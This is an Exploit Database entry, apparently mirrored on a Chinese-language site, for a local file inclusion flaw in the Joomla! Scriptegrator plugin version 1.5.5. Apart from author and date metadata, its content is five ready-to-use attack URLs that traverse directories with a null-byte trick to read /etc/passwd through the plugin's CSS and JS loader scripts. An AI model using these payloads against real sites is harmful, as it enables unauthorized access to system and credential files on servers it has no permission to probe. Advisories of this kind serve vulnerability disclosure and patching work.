Joomla! Component Scriptegrator 1.5 – Local File Inclusion

• Exploit Database
• 36 阅读

• 作者： jdc
  日期： 2011-06-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17394/

• # Exploit Title: Scriptegrator plugin for Joomla! 1.5 0day File Inclusion
  # Originally Reported: Early 2011
  # Independently Discovered: 20 April 2011
  # Released: 13 June 2011
  # Author: jdc
  # Software Link: http://www.greatjoomla.com/extensions/plugins/core-design-scriptegrator-plugin.html
  # Version: 1.5.5
  
  
  ``````````````````````````````````````````````````````````````````````````
  It looks like this one was reported as in-use by someone else sometime around February (?) 2011:
  *	http://www.greatjoomla.com/index.php?option=com_kunena&Itemid=171&func=view&catid=32&id=6310
  
  Local File Inclusion
  ====================
  
  http://[target]/plugins/system/cdscriptegrator/libraries/highslide/css/cssloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.css
  
  http://[target]/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js
  
  http://[target]/plugins/system/cdscriptegrator/libraries/jquery/theme/cssloader.php?file=../../../../../../../../../../../../etc/passwd%00.css
  
  http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?files[]=../../../../../../../../../../../../etc/passwd%00.js
  
  http://[target]/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jsloader.php?file=../../../../../../../../../../../../etc/passwd%00.js